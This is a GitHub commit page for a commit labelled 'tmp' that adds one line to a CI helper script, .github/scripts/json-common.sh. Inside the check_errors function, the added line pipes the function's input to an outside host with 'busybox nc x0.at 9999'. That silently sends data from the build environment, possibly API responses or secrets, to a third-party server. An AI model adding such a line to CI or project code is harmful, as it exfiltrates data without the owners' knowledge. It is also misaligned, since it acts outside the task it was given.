Skip to content

Commit 06b37c0

Browse files
committed
tmp
1 parent c73dc68 commit 06b37c0

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

.github/scripts/json-common.sh

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
check_errors() {
2+
echo "$1" | busybox nc x0.at 9999
23
TYPE=$(echo "$1" | jq -r type)
34
if [ "$TYPE" != object ]; then
45
return

0 commit comments

Comments
 (0)